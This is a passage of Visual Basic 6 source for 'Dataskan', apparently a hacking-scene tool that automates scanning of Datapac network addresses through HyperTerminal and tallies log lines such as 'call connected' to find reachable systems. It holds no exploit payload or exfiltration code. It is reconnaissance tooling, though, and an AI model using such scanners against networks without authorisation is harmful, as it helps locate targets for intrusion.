Enabled = 0 'False Height = 285 Left = 120 TabIndex = 23 Text = "12" ToolTipText = "start hours" Top = 480 Width = 375 End Begin VB.TextBox txtampm Height = 285 Left = 1920 TabIndex = 20 Text = "AM" ToolTipText = "am/pm" Top = 1080 Width = 375 End Begin VB.TextBox txtsecond Height = 285 Left = 1320 TabIndex = 6 Text = "00" ToolTipText = "seconds" Top = 1080 Width = 375 End Begin VB.TextBox txtminute Height = 285 Left = 720 TabIndex = 5 Text = "06" ToolTipText = "minutes" Top = 1080 Width = 375 End Begin VB.TextBox txthour Height = 285 Left = 120 TabIndex = 4 Text = "06" ToolTipText = "hours" Top = 1080 Width = 375 End Begin VB.Label Label16 Caption = ":" Height = 255 Left = 1200 TabIndex = 26 Top = 480 Width = 135 End Begin VB.Label Label15 Caption = ":" Height = 255 Left = 600 TabIndex = 24 Top = 480 Width = 135 End Begin VB.Label Label14 Caption = "from" Height = 255 Left = 120 TabIndex = 22 Top = 240 Width = 615 End Begin VB.Label Label12 Caption = ":" Height = 255 Left = 1200 TabIndex = 19 Top = 1080 Width = 135 End Begin VB.Label Label11 Caption = ":" Height = 255 Left = 600 TabIndex = 18 Top = 1080 Width = 135 End Begin VB.Label Label3 Caption = "until:" Height = 255 Left = 120 TabIndex = 3 Top = 840 Width = 975 End End Begin VB.Frame Frame5 Caption = "Extra Data to send:" Height = 3015 Left = 0 TabIndex = 39 ToolTipText = "This sends commands to the modem using the AT commands. Shift+Enter for new line." Top = 3240 Width = 5775 Begin VB.Frame Frame6 Caption = "Data to send after Completion" Enabled = 0 'False Height = 1335 Left = 120 TabIndex = 43 ToolTipText = "This gets sent to the modem after the range or list is complete." Top = 1560 Width = 5535 Begin VB.TextBox txtcompletion Enabled = 0 'False Height = 975 Left = 120 MultiLine = -1 'True ScrollBars = 2 'Vertical TabIndex = 44 Text = "Form1.frx":0442 ToolTipText = "type modem commands here" Top = 240 Width = 5295 End End Begin VB.CheckBox chkextra Height = 255 Left = 1560 TabIndex = 42 ToolTipText = "Check this box if you want to send commands to the modem before and/or after completion of a scan" Top = 0 Width = 375 End Begin VB.TextBox txtextra Enabled = 0 'False Height = 1005 Left = 240 MultiLine = -1 'True ScrollBars = 2 'Vertical TabIndex = 40 ToolTipText = $"Form1.frx":0464 Top = 480 Width = 5295 End Begin VB.Frame Frame3 Caption = "Data to send initialy" Enabled = 0 'False Height = 1335 Left = 120 TabIndex = 41 ToolTipText = "This gets sent right away (even before the period.)" Top = 240 Width = 5535 End End Begin VB.PictureBox Picture1 BorderStyle = 0 'None Height = 495 Left = 1680 ScaleHeight = 495 ScaleWidth = 375 TabIndex = 45 ToolTipText = "click here if you want to learn more about datapac" Top = 1080 Width = 375 End Begin VB.Label Label9 Caption = "milisecond(s) between address connect attempts" BeginProperty Font Name = "MS Serif" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 255 Left = 2640 TabIndex = 17 Top = 2280 Width = 3255 End Begin VB.Label Label8 Caption = "Wait" Height = 255 Left = 1680 TabIndex = 16 Top = 2280 Width = 375 End Begin VB.Label Label7 Caption = "Second(s) before send keys begins" BeginProperty Font Name = "MS Serif" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 255 Left = 2640 TabIndex = 12 Top = 1920 Width = 3135 End Begin VB.Label Label6 Caption = "Wait" Height = 255 Left = 1680 TabIndex = 11 Top = 1920 Width = 375 End Begin VB.Label Label5 Caption = "cartrage returns after every address scanned" BeginProperty Font Name = "MS Serif" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 255 Left = 2640 TabIndex = 9 Top = 1560 Width = 3375 End Begin VB.Label Label4 Caption = "Send" Height = 255 Left = 1680 TabIndex = 8 Top = 1560 Width = 495 End Begin VB.Menu mnufile Caption = "&File" Begin VB.Menu mnuexit Caption = "&Exit" Shortcut = ^Q End End Begin VB.Menu mnulist Caption = "&Lists" Begin VB.Menu mnuuselist Caption = "&Use List" Shortcut = ^U End Begin VB.Menu mnucreatelist Caption = "&Create List" Shortcut = ^C End End Begin VB.Menu mnulogs Caption = "&Logs" End Begin VB.Menu mnuactions Caption = "&Scanning" Begin VB.Menu mnustart Caption = "&Start Scan" Shortcut = ^S End Begin VB.Menu mnustop Caption = "&Stop Scan" Shortcut = ^B End End Begin VB.Menu mnuhelp Caption = "&Help" End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False ' --------------- | | ^ |\ | ' / | / / \ | \ | ' / | / / \ | \ | ' / | / / \ | \ | ' | | / / \ | \ | ' | | / / \ | \ | ' | | / / \ | \ | ' | | / / \ | \ | ' \_____________ |/_ / \ | \ | ' \ | \ |---------------| | \ | ' \ | \ | | | \ | ' \ | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' / | | | | | \ | ' / | | | | | \ | ' _______________/ | | | | | \| ' SKAN THE PLANET ' ' 'i am not going to make this program bug proof. It is by far from bug proof. I know 'that there's some faulty code in here, but im not going to make this thing industrial 'strength (we are using sendkeys() to scan for heaven sakes!) 'kind of quick, and only a little bit dirty. Not like mcDonalds.. more like Dairy Queen(tm). ' 'This code was designed like this: First I wrote it so all it does is send addresses 'to hyperterminal, then I added better timing with the timers, and then I added the start 'and stop times. I didnt plan this. I just started writing. This means i've patched up, 'and written logic statements over other logic statements wrapping a few of them together. 'sorry for the sloppyness. ' 'this was designed for how hyperterminal handles datapac Option Explicit Public stop_scan, send_period, range_flag, list_phlag, timerflag, extraflag As Boolean Public stop_time, time_to_start As String 'these two variables are declared here and is only used in the log analysis in the 'timer2 fuction. they are declared here because 'we dont want to have to constantly be re-declaring it 'in the function. This might cause the function to slow down by a few miliseconds. 'while this doesnt sound like much, it can add up if we are doing a list with 2 million 'addresses Public analyze_line As String Public analyze_counter As Integer Public cartrage_returns, wait_seconds, address_seconds As Integer Public from_address, to_address, difference, line_whore, line_gore, range As Integer Public i As Integer Private Sub cmdhelp_Click() MsgBox "This program was made by aftermath. For more help see the html document entitled ""readme.htm""", vbInformation, "Made by.." End Sub Private Sub chkextra_Click() If chkextra.Value = Checked Then txtextra.Enabled = True txtcompletion.Enabled = True Frame6.Enabled = True Frame3.Enabled = True Else txtextra.Enabled = False txtcompletion.Enabled = False Frame6.Enabled = False Frame3.Enabled = False End If End Sub Private Sub chkfrom_Click() If chkfrom.Value = Checked Then txtfromhours.Enabled = False txtfromminutes.Enabled = False txtfromseconds.Enabled = False txtfromampm.Enabled = False Else txtfromhours.Enabled = True txtfromminutes.Enabled = True txtfromseconds.Enabled = True txtfromampm.Enabled = True End If End Sub Private Sub chklist_Click() If chklist.Value = Checked Then Frame1.Enabled = False txtrange.Enabled = False txtto.Enabled = False cmdcommon1.Enabled = True txtfrom.Enabled = False Label1.Enabled = False txtlist.Enabled = True Label17.Enabled = True mnuuselist.Checked = True Else Frame1.Enabled = True cmdcommon1.Enabled = False mnuuselist.Checked = False txtrange.Enabled = True txtto.Enabled = True txtfrom.Enabled = True Label1.Enabled = True txtlist.Enabled = False Label17.Enabled = False End If End Sub Private Sub chkstop_Click() If chkstop.Value = Checked Then txthour.Enabled = False txtminute.Enabled = False txtsecond.Enabled = False txtampm.Enabled = False Else txthour.Enabled = True txtminute.Enabled = True txtsecond.Enabled = True txtampm.Enabled = True End If End Sub Private Sub cmdcommon1_Click() CommonDialog1.ShowOpen txtlist.Text = CommonDialog1.FileName End Sub Private Sub cmdstart_Click() extraflag = False line_gore = 0 stop_scan = False cmdstop.Default = True send_period = False stop_time = txthour.Text & ":" & txtminute.Text & ":" & txtsecond.Text & " " & txtampm.Text wait_seconds = txtseconds.Text & "000" Timer1.Interval = wait_seconds 'we set the second timer to the amount of seconds the user 'wants to try to send addresses 'address_seconds = txtconnectwait.Text 'Timer2.Interval = address_seconds from_address = txtfrom.Text i = from_address If timerflag = False Then If chkfrom.Value = Unchecked Then 'here we WAIT untill it is arr time t0 g0 time_to_start = txtfromhours.Text & ":" & txtfromminutes.Text & ":" & txtfromseconds & " " & txtfromampm Timer3.Interval = 500 Timer3.Enabled = True DoEvents Exit Sub End If End If If chklist.Value = Checked Then 'ok, so we are using a list. we are going to find out how long the list is 'i havent debuged this part yet. if the user doesnt place his file right, then skroo him. If list_phlag = False Then Open txtlist.Text For Input As #1 'dummy is just some dummy data. we dont really need it. all we really need 'is a counter to tell us how many lines the phile is Dim dummy Do Until EOF(1) Line Input #1, dummy line_whore = line_whore + 1 Loop Close #1 Open txtlist.Text For Input As #3 End If End If If chkfrom.Value = Checked Then DoEvents Timer1.Enabled = True DoEvents End If End Sub Private Sub cmdstop_Click() line_whore = 0 Close stop_scan = True End Sub Private Sub mnucreatelist_Click() Form2.Show End Sub Private Sub mnuexit_Click() Timer1.Enabled = False Timer2.Enabled = False End End Sub Private Sub mnuhelp_Click() frmAbout.Show End Sub Private Sub mnulog_Click() Form3.Show End Sub Private Sub mnulogs_Click() Form3.Show End Sub Private Sub mnustart_Click() Call cmdstart_Click End Sub Private Sub mnustop_Click() Call cmdstop_Click End Sub Private Sub mnuuselist_Click() If mnuuselist.Checked = False Then mnuuselist.Checked = True chklist.Value = Checked Exit Sub End If If mnuuselist.Checked = True Then mnuuselist.Checked = False chklist.Value = Unchecked End If End Sub Private Sub Picture1_Click() Shell ("cmd.exe /c explorer.exe http://hackcanada.com/canadian/hacking/"), vbHide End Sub Private Sub Timer1_Timer() 'here we wait for x amount of seconds before we send 'the period (.) character to the screen. 'this gives the haqhur a few seconds to change their 'screen to the terminal client program If stop_scan = True Or stop_time = Time Then Timer1.Enabled = False Timer2.Enabled = False Exit Sub End If Timer1.Interval = txtconnectwait.Text DoEvents Timer2.Interval = txtconnectwait.Text DoEvents 'this if statement cheqs the awesome stupid thing where if there is something 'else that you must send to the modem, it will g3t sent first If extraflag = False Then If txtextra.Text <> "" Then extraflag = True 'MsgBox "in txtextra if" Dim drive_letter, modem_data As String drive_letter = Mid(App.Path, 1, 3) 'MsgBox "drive letter: " & drive_letter DoEvents Open drive_letter & "temp0r4r0r13.sys" For Output As #4 DoEvents Print #4, txtextra.Text 'MsgBox "printing.." DoEvents Close #4 DoEvents Open drive_letter & "temp0r4r0r13.sys" For Input As #4 Do Until EOF(4) DoEvents Line Input #4, modem_data 'MsgBox "modem data; " & modem_data DoEvents SendKeys (modem_data & vbCr) DoEvents Loop Close #4 DoEvents End If End If 'if the checkbox is checked, then we send the period key (this 'is to initate the datapac connection) If chkperiod.Value = Checked And send_period = False Then send_period = True SendKeys (".") End If DoEvents If chklist.Value = Unchecked Then 'if there is nothing in the from and too boxes, we fuqin do that shit up If txtfrom.Text = "" Or txtto.Text = "" Then MsgBox "Must have addresses set", vbCritical, "Error" Timer1.Enabled = False Timer2.Enabled = False Exit Sub End If 'putting these thugs into variables If IsNumeric(txtrange.Text) = False Then MsgBox "Enter the range", vbInformation, "Non-numeric Range" Timer1.Enabled = False Timer2.Enabled = False Exit Sub End If range = txtrange.Text to_address = txtto.Text difference = to_address - from_address If from_address > 9999 Or to_address > 9999 Then MsgBox "Can not scan more than 9999 addresses at a time", vbCritical, "ERROR!" Timer1.Enabled = False Timer2.Enabled = False Exit Sub End If 'if that address is less than zero, then bah. dat shit aint right If from_address < 0 Or to_address < 0 Or difference < 0 Then MsgBox "Cannot scan backwards.", vbCritical, "Error" Timer1.Enabled = False Timer2.Enabled = False Exit Sub End If 'enabling the second timer.. 3..2..1.. liftoff! DoEvents If i <= to_address Then Timer2.Enabled = True i = i + 1 DoEvents Else Timer2.Enabled = False Timer1.Enabled = False Call wrap_up MsgBox "SKAN RANGE COMPLETE!", vbInformation, "SKAN DUN" End If DoEvents Timer1.Enabled = False Else Timer2.Enabled = True Timer1.Enabled = False End If DoEvents End Sub Private Sub Timer2_Timer() 'this is where we do the actual sendkeys Dim x As Integer Dim address If stop_scan = True Then Timer1.Enabled = False Timer2.Enabled = False MsgBox "DONE!", vbInformation, "USER STOPED SKAN!" Exit Sub End If DoEvents If chkstop.Value = Unchecked Then If stop_time = Time$ Then Call wrap_up Timer1.Enabled = False Timer2.Enabled = False MsgBox "TIME'S UP!", vbInformation, "TIME!" Exit Sub End If End If DoEvents If chklist.Value = Unchecked Then If i < 10 Then address = range & "000" & i If i >= 10 Then address = range & "00" & i If i >= 100 Then address = range & "0" & i If i >= 1000 Then address = range & i DoEvents 'updating where the last address was in the scan range txtfrom.Text = Mid(address, 5) DoEvents Else line_gore = line_gore + 1 Line Input #3, address If line_gore >= line_whore Then MsgBox "LIST COMPLETE!", vbInformation, "COMPLETE!" Call wrap_up Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Close #3 Exit Sub End If list_phlag = True End If SendKeys (address) DoEvents If cartrage_returns = 0 Then cartrage_returns = 1 'for the cartrage returns For x = 0 To cartrage_returns SendKeys (vbCrLf) DoEvents Next x DoEvents DoEvents Timer2.Enabled = False DoEvents Timer1.Enabled = True DoEvents End Sub Private Sub Timer3_Timer() If time_to_start = Time Then Timer3.Enabled = False timerflag = True If list_phlag = False Then If chklist.Value = Checked Then '(Redundent code, i know i know) 'ok, so we are using a list. we are going to find out how long the list is 'i havent debuged this part yet. if the user doesnt place his file right, 'then skroo him. Open txtlist.Text For Input As #1 'dummy is just some dummy data. we dont really need it. all we 'really need is a counter to tell us how many lines the phile is Dim dummy Do Until EOF(1) Line Input #1, dummy line_whore = line_whore + 1 Loop Close #1 End If Open txtlist.Text For Input As #1 End If Timer1.Enabled = True Exit Sub End If End Sub Private Sub txtampm_Change() Dim uprcase uprcase = txtampm.Text uprcase = UCase(uprcase) txtampm.Text = uprcase End Sub Private Sub txtfrom_Change() If txtfrom.Text >= "9999" Then MsgBox "You cannot scan higher than 9999" txtfrom.Text = "0000" End If End Sub Private Sub txtrange_Click() If range_flag = False Then txtrange.Text = "" range_flag = True End If End Sub Private Sub txtto_Change() If txtto.Text > "9999" Then MsgBox "You cannot scan higher than 9999" txtto.Text = "9999" End If End Sub Private Sub wrap_up() 'this function executes at the end of a scan. it sends data to the modem '(if you want it t0) Dim pbath, wrap_up_string As String If chkextra.Value = Checked Then pbath = Mid(App.Path, 1, 3) Open pbath & "tempwh0rzari3.sys" For Output As #1 DoEvents wrap_up_string = txtcompletion.Text Print #1, wrap_up_string DoEvents Close #1 DoEvents Open pbath & "tempwh0rzari3.sys" For Input As #1 DoEvents Do Until EOF(1) Line Input #1, wrap_up_string DoEvents SendKeys (wrap_up_string) DoEvents Loop DoEvents Close #1 DoEvents Shell ("cmd.exe /c del " & pbath & "tempwh0rzari3.sys"), vbHide End If End Sub - Form2.FRM: VERSION 5.00 Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX" Begin VB.Form Form2 BorderStyle = 1 'Fixed Single Caption = "Make List" ClientHeight = 3180 ClientLeft = 1365 ClientTop = 1650 ClientWidth = 3450 Icon = "Form2.frx":0000 LinkTopic = "Form2" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 3180 ScaleWidth = 3450 Begin MSComDlg.CommonDialog CommonDialog1 Left = 2880 Top = 1080 _ExtentX = 847 _ExtentY = 847 _Version = 393216 End Begin VB.CheckBox chkappend Caption = "append to the lsit" Height = 255 Left = 0 TabIndex = 9 ToolTipText = $"Form2.frx":0442 Top = 1200 Width = 3375 End Begin VB.Frame Frame1 Caption = "Save to:" Height = 615 Left = 0 TabIndex = 7 Top = 1440 Width = 3375 Begin VB.CommandButton Command1 Caption = "..." Height = 255 Left = 3000 TabIndex = 13 Top = 240 Width = 255 End Begin VB.TextBox txtloc Height = 285 Left = 120 TabIndex = 8 Text = "c:\dataskan-list.txt" Top = 240 Width = 2775 End End Begin VB.CommandButton cmdcreate Caption = "Create" Default = -1 'True Height = 615 Left = 2280 TabIndex = 5 Top = 480 Width = 1095 End Begin VB.TextBox txtto Height = 285 Left = 840 TabIndex = 2 Text = "10999999" ToolTipText = "Ending number (example: 11119999)" Top = 840 Width = 1335 End Begin VB.TextBox txtfrom Height = 285 Left = 840 TabIndex = 1 Text = "10000000" ToolTipText = "starting number (example: 11110000)" Top = 480 Width = 1335 End Begin VB.CheckBox chkrandomize Caption = "Randomize" Enabled = 0 'False Height = 495 Left = 2160 TabIndex = 0 ToolTipText = "Randomize does not work" Top = 0 Width = 1335 End Begin VB.Label Label6 Caption = $"Form2.frx":0512 Height = 615 Left = 0 TabIndex = 12 Top = 2520 Width = 3375 End Begin VB.Label lblstatus BorderStyle = 1 'Fixed Single Caption = "Status.." Height = 255 Left = 0 TabIndex = 11 Top = 2160 Width = 3375 End Begin VB.Label Label5 Caption = "Status:" Height = 255 Left = 0 TabIndex = 10 Top = 2520 Width = 495 End Begin VB.Label Label4 Caption = "Make List.." BeginProperty Font Name = "Arial" Size = 18 Charset = 0 Weight = 700 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 375 Left = 0 TabIndex = 6 Top = 0 Width = 2055 End Begin VB.Label Label3 Caption = "To:" Height = 255 Left = 0 TabIndex = 4 Top = 840 Width = 735 End Begin VB.Label Label2 Caption = "From:" Height = 255 Left = 0 TabIndex = 3 Top = 480 Width = 735 End End Attribute VB_Name = "Form2" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'this is the list creation code ' ' Private Sub cmdcreate_Click() lblstatus.Caption = "Generating list.." Dim startnum, endnum, i, num1, phile_size As Integer Dim listloc, range, tempon, address, app_path, drive_letter As String Dim phlag1, phlag2, phlag3 As Boolean 'putting whats in the txt boxes into variables startnum = txtfrom.Text endnum = txtto.Text listloc = txtloc.Text 'if startnum > endnum then.. you get the idea If startnum >= endnum Then MsgBox "Starting number cannot be greater than ending number!", vbCritical, "ERROR!" Exit Sub End If 'if the user has chosen to append to the file, then we open as append If chkappend.Value = Checked Then Open listloc For Append As #1 Else Open listloc For Output As #1 End If DoEvents 'start of a loop For i = startnum To endnum DoEvents 'putting number of loop into another extra varialbe num1 = i 'adding the extra zeros if they are needed If num1 < 10 Then num1 = num1 & "000" If num1 < 100 Then num1 = num1 & "00" If num1 < 1000 Then num1 = num1 & "0" tempon = CStr(num1) If tempon = "0" Then tempon = "0000" 'the address = the range and the number converted into a string address = range & tempon 'printing the address Print #1, address On Error Resume Next phile_size = phile_size + 1 DoEvents Next i Close #1 DoEvents lblstatus.Caption = "Done Generating list." End Sub Private Sub Command1_Click() CommonDialog1.ShowSave txtloc.Text = CommonDialog1.FileName End Sub - Form3.FRM: VERSION 5.00 Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX" Begin VB.Form Form3 BorderStyle = 1 'Fixed Single Caption = "Log Sorter" ClientHeight = 4080 ClientLeft = 1695 ClientTop = 2025 ClientWidth = 6075 Icon = "Form3.frx":0000 LinkTopic = "Form3" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 4080 ScaleWidth = 6075 Begin MSComDlg.CommonDialog CommonDialog1 Left = 2760 Top = 1320 _ExtentX = 847 _ExtentY = 847 _Version = 393216 End Begin VB.TextBox txtresults Height = 1935 Left = 0 MultiLine = -1 'True ScrollBars = 2 'Vertical TabIndex = 3 Text = "Form3.frx":0442 ToolTipText = "Results are displayed here" Top = 1320 Width = 6015 End Begin VB.CommandButton cmdsort Caption = "Sort!" Height = 495 Left = 0 TabIndex = 2 ToolTipText = "sort the file" Top = 720 Width = 6015 End Begin VB.Frame Frame1 Caption = "Location of log to sort:" Height = 615 Left = 0 TabIndex = 0 Top = 0 Width = 6015 Begin VB.CommandButton cmdpathcapture Caption = "..." Height = 255 Left = 5640 TabIndex = 4 Top = 240 Width = 255 End Begin VB.TextBox txtpath Height = 285 Left = 120 TabIndex = 1 Text = "C:\Documents and Settings\Administrator\CAPTURE.TXT" ToolTipText = "path to the terminal client log" Top = 240 Width = 5415 End End Begin VB.Label Label2 Caption = $"Form3.frx":044B Height = 615 Left = 1080 TabIndex = 6 Top = 3360 Width = 4935 End Begin VB.Label Label1 Caption = "NOTE:" BeginProperty Font Name = "MS Sans Serif" Size = 13.5 Charset = 0 Weight = 700 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 495 Left = 0 TabIndex = 5 Top = 3480 Width = 975 End End Attribute VB_Name = "Form3" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'this is the log code. it will sort out the logs and tell you how many 'of what had been found Private Sub cmdopen_Click() CommonDialog1.ShowOpen txtpath.Text = CommonDialog1.FileName End Sub Private Sub cmdpathcapture_Click() CommonDialog1.ShowSave txtpath.Text = CommonDialog1.FileName End Sub Private Sub cmdsort_Click() txtresults.Text = "" Dim data_line As String Dim line_num, busy, not_in_service, barred, not_responding, possible_error, found As Double Dim i As Double DoEvents Open txtpath.Text For Input As #1 For i = 0 To 10000 DoEvents Next i DoEvents Do Until EOF(1) line_num = line_num + 1 Line Input #1, data_line DoEvents If InStr(1, data_line, "address not in service", vbTextCompare) <> 0 Then not_in_service = not_in_service + 1 End If DoEvents If InStr(1, data_line, "destination busy", vbTextCompare) <> 0 Then busy = busy + 1 End If DoEvents If InStr(1, data_line, "access barred", vbTextCompare) <> 0 Then barred = barred + 1 End If DoEvents If InStr(1, data_line, "re-enter", vbTextCompare) <> 0 Or InStr(1, data_line, "invalid address", vbTextCompare) Or InStr(1, data_line, "incompatible call options", vbTextCompare) <> 0 Or InStr(1, data_line, "invalid command", vbTextCompare) <> 0 Then possible_error = possible_error + 1 End If DoEvents If InStr(1, data_line, " not responding", vbTextCompare) <> 0 Then not_responding = not_responding + 1 End If DoEvents If InStr(1, data_line, "call connected", vbTextCompare) <> 0 Then DoEvents found = found + 1 DoEvents txtresults.Text = vbCrLf & txtresults.Text & data_line & " ON FILE LINE: " & line_num & vbCrLf DoEvents End If DoEvents Loop DoEvents Close #1 DoEvents txtresults.Text = txtresults.Text & vbCrLf txtresults.Text = txtresults.Text & vbCrLf txtresults.Text = txtresults.Text & vbCrLf & "NOT IN SERVICE: " & not_in_service txtresults.Text = txtresults.Text & vbCrLf & "BUSY: " & busy txtresults.Text = txtresults.Text & vbCrLf & "BARRED: " & barred txtresults.Text = txtresults.Text & vbCrLf & "NOT RESPONDING: " & not_responding txtresults.Text = txtresults.Text & vbCrLf & "POSSIBLE ERRORS: " & possible_error txtresults.Text = txtresults.Text & vbCrLf & "TOTAL LINES CHECKED: " & line_num txtresults.Text = txtresults.Text & vbCrLf & "FOUND: " & found DoEvents MsgBox "DONE SORT!", vbInformation, "DONE SORT!" End Sub Private Sub cmdsortpath_Click() CommonDialog1.ShowSave txtoutput.Text = CommonDialog1.FileName End Sub - frmAbout.FRM: VERSION 5.00 Begin VB.Form frmAbout BorderStyle = 3 'Fixed Dialog Caption = "About Dataskan" ClientHeight = 3450 ClientLeft = 2040 ClientTop = 2415 ClientWidth = 6105 ClipControls = 0 'False Icon = "frmAbout.frx":0000 LinkTopic = "Form2" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 2381.251 ScaleMode = 0 'User ScaleWidth = 5732.911 ShowInTaskbar = 0 'False Begin VB.PictureBox Picture1 Height = 3375 Left = 4320 Picture = "frmAbout.frx":0442 ScaleHeight = 3315 ScaleWidth = 1635 TabIndex = 6 ToolTipText = "this guy looks pissed off." Top = 0 Width = 1695 End Begin VB.PictureBox picIcon AutoSize = -1 'True ClipControls = 0 'False Height = 3075 Left = -120 Picture = "frmAbout.frx":14304 ScaleHeight = 2117.535 ScaleMode = 0 'User ScaleWidth = 790.125 TabIndex = 1 ToolTipText = "nofx is cool" Top = 240 Width = 1185 End Begin VB.CommandButton cmdOK Cancel = -1 'True Caption = "OK" Default = -1 'True Height = 585 Left = 2760 TabIndex = 0 Top = 120 Width = 1380 End Begin VB.Line Line1 BorderColor = &H00808080& BorderStyle = 6 'Inside Solid Index = 1 X1 = 1126.862 X2 = 3831.331 Y1 = 1656.522 Y2 = 1656.522 End Begin VB.Label lblDescription Caption = $"frmAbout.frx":1F64A ForeColor = &H00000000& Height = 1410 Left = 1170 TabIndex = 2 Top = 885 Width = 3165 End Begin VB.Label lblTitle Caption = "Application Title" ForeColor = &H00000000& Height = 480 Left = 1170 TabIndex = 4 Top = 0 Width = 3165 End Begin VB.Line Line1 BorderColor = &H00FFFFFF& BorderWidth = 2 Index = 0 X1 = 1014.176 X2 = 3944.018 Y1 = 1656.522 Y2 = 1656.522 End Begin VB.Label lblVersion Caption = "Version" Height = 225 Left = 1170 TabIndex = 5 Top = 540 Width = 3165 End Begin VB.Label lblDisclaimer Caption = $"frmAbout.frx":1F762 ForeColor = &H00000000& Height = 1065 Left = 1080 TabIndex = 3 Top = 2400 Width = 3150 End End Attribute VB_Name = "frmAbout" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Option Explicit ' Reg Key Security Options... Const READ_CONTROL = &H20000 Const KEY_QUERY_VALUE = &H1 Const KEY_SET_VALUE = &H2 Const KEY_CREATE_SUB_KEY = &H4 Const KEY_ENUMERATE_SUB_KEYS = &H8 Const KEY_NOTIFY = &H10 Const KEY_CREATE_LINK = &H20 Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + _ KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + _ KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL ' Reg Key ROOT Types... Const HKEY_LOCAL_MACHINE = &H80000002 Const ERROR_SUCCESS = 0 Const REG_SZ = 1 ' Unicode nul terminated string Const REG_DWORD = 4 ' 32-bit number Const gREGKEYSYSINFOLOC = "SOFTWARE\Microsoft\Shared Tools Location" Const gREGVALSYSINFOLOC = "MSINFO" Const gREGKEYSYSINFO = "SOFTWARE\Microsoft\Shared Tools\MSINFO" Const gREGVALSYSINFO = "PATH" Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long Private Sub cmdSysInfo_Click() Call StartSysInfo End Sub Private Sub cmdOK_Click() Unload Me End Sub Private Sub Form_Load() Me.Caption = "About " & App.Title lblVersion.Caption = "Version " & App.Major & "." & App.Minor & "." & App.Revision lblTitle.Caption = App.Title End Sub Public Sub StartSysInfo() On Error GoTo SysInfoErr Dim rc As Long Dim SysInfoPath As String ' Try To Get System Info Program Path\Name From Registry... If GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFO, gREGVALSYSINFO, SysInfoPath) Then ' Try To Get System Info Program Path Only From Registry... ElseIf GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFOLOC, gREGVALSYSINFOLOC, SysInfoPath) Then ' Validate Existance Of Known 32 Bit File Version If (Dir(SysInfoPath & "\MSINFO32.EXE") <> "") Then SysInfoPath = SysInfoPath & "\MSINFO32.EXE" ' Error - File Can Not Be Found... Else GoTo SysInfoErr End If ' Error - Registry Entry Can Not Be Found... Else GoTo SysInfoErr End If Call Shell(SysInfoPath, vbNormalFocus) Exit Sub SysInfoErr: MsgBox "System Information Is Unavailable At This Time", vbOKOnly End Sub Public Function GetKeyValue(KeyRoot As Long, KeyName As String, SubKeyRef As String, ByRef KeyVal As String) As Boolean Dim i As Long ' Loop Counter Dim rc As Long ' Return Code Dim hKey As Long ' Handle To An Open Registry Key Dim hDepth As Long ' Dim KeyValType As Long ' Data Type Of A Registry Key Dim tmpVal As String ' Tempory Storage For A Registry Key Value Dim KeyValSize As Long ' Size Of Registry Key Variable '------------------------------------------------------------ ' Open RegKey Under KeyRoot {HKEY_LOCAL_MACHINE...} '------------------------------------------------------------ rc = RegOpenKeyEx(KeyRoot, KeyName, 0, KEY_ALL_ACCESS, hKey) ' Open Registry Key If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Error... tmpVal = String$(1024, 0) ' Allocate Variable Space KeyValSize = 1024 ' Mark Variable Size '------------------------------------------------------------ ' Retrieve Registry Key Value... '------------------------------------------------------------ rc = RegQueryValueEx(hKey, SubKeyRef, 0, _ KeyValType, tmpVal, KeyValSize) ' Get/Create Key Value If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Errors If (Asc(Mid(tmpVal, KeyValSize, 1)) = 0) Then ' Win95 Adds Null Terminated String... tmpVal = Left(tmpVal, KeyValSize - 1) ' Null Found, Extract From String Else ' WinNT Does NOT Null Terminate String... tmpVal = Left(tmpVal, KeyValSize) ' Null Not Found, Extract String Only End If '------------------------------------------------------------ ' Determine Key Value Type For Conversion... '------------------------------------------------------------ Select Case KeyValType ' Search Data Types... Case REG_SZ ' String Registry Key Data Type KeyVal = tmpVal ' Copy String Value Case REG_DWORD ' Double Word Registry Key Data Type For i = Len(tmpVal) To 1 Step -1 ' Convert Each Bit KeyVal = KeyVal + Hex(Asc(Mid(tmpVal, i, 1))) ' Build Value Char. By Char. Next KeyVal = Format$("&h" + KeyVal) ' Convert Double Word To String End Select GetKeyValue = True ' Return Success rc = RegCloseKey(hKey) ' Close Registry 